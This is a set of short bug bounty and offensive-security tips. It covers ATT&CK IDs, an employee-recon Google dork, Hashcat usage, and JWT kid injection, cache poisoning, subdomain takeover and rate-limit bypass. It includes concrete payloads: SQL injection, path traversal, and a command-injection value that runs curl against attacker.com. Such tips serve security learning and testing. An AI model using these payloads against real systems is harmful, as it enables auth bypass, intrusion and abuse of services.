MITRE ATT&CK Learning Tip Use the ATT&CK ID numbering system as a quick reference: Techniques are formatted as Txxxx (e.g., T1059 Command and Scripting Interpreter), and sub-techniques add a decimal suffix Txxxx.yyy (e.g., T1059.001 PowerShell, T1059.003 Windows Command Shell). When you see a specific ID in a report, you can immediately know which major category it belongs to and which specific implementation it is. Practice: When reading a threat report, first look at the sub-technique ID (with decimal) rather than just the main technique ID the sub-technique is what tells you the specific detection details (process names, command-line patterns). Spear Phishing Awareness 🎯 An email can say: "Hi [your name], please review the attached invoice for the project we discussed last week. OSINT Tip: Google Dork for Finding Public Employee Badges and Team Photos site:URL ("our team" OR "staff" OR "employees") intext:"@URL" This short OSINT dork finds team and staff pages on a target domain that pair employee names with contact details and photos. It is useful for identifying personnel and mapping an organization during recon. Bug Bounty Tip: JWT kid Header Injection Look for: JWTs with a kid (Key ID) header - decode the token and inspect {"alg":"HS256","kid":"key1"}. Test by manipulating kid to point to attacker-controlled paths or SQL payloads: · Path traversal: "kid":"../../../../dev/null" → sign with empty key · SQLi: "kid":"key1' UNION SELECT 'attacker_secret'-- -" · Command injection: "kid":"key1|curl attacker.com" If the server uses kid to fetch or query the signing key unsafely, it may indicate JWT kid Injection, enabling token forgery and full auth bypass. cvENGINE is an AI-first external attack surface assessment tool that continuously discovers assets, validates vulnerabilities with evidence, and integrates with developer agents via MCP. It runs a full pipeline per target using bbot, nuclei, nmap, and naabu, while pulling CVE intelligence from CISA KEV, EPSS, Exploit-DB, and Metasploit. AI is optional—you can bring Anthropic, OpenAI, Ollama, or vLLM keys for triage and template drafting, but the tool still discovers, scans, and matches CVEs without any model configured. Bug Bounty Tip: Web Cache Poisoning via Payload Fuzzing Look for: Reflected headers like X-Forwarded-Host, X-Forwarded-Scheme, and X-Host on cacheable pages Test payload: X-Forwarded-Host: evil.com If evil.com gets cached and served to other users in links/redirects, it may indicate Web Cache Poisoning, enabling stored XSS or open redirect at scale. Bug Bounty Tip: Subdomain Takeover via DNS Signals Look for: Dangling CNAME records pointing to unclaimed services - S3 buckets, GitHub Pages, Heroku, and expired SaaS platforms Test payload: dig CNAME sub.target.com - an NXDOMAIN from the third-party service confirms a takeover candidate For more tips join our Telegram channel: t.me/bugbountyusa #BugBounty #SubdomainTakeover #PayloadFuzzing #InfoSec

Kali Tool Tip: Hashcat Save your settings so you stop retyping them: keep your go-to mode and attack flags in a shell alias or a .hc notes file, e.g. alias hcrack='hashcat -m 1000 -a 0 -O -w 3'. Set the mode and workload once, swap only the hash and wordlist. Practice: Crack one lab hash set, then check your host telemetry: hashcat pulls heavy GPU/CPU load and leaves a .potfile. If your EDR wouldn't flag a sustained GPU spike or hashcat on a workstation, that's your next detection rule. API Penetesting Tip: Rate Limit Bypass via Header & Path Manipulation Look for: Endpoints with rate limits that key on IP, path, or headers - login, OTP send/verify, password reset, coupon redemption, and search APIs. Test by rotating X-Forwarded-For, X-Real-IP, X-Client-IP, and Forwarded headers; try path variants (/api/v1/login, /api/v1/login/, /api/v1//login, case changes, %2e, ;, ..;/), HTTP/2 vs HTTP/1.1, and batch endpoints that bypass per-request counters. If bypassed, it may enable OTP brute force, credential stuffing, coupon abuse, SMS bombing, or enumeration at scale.
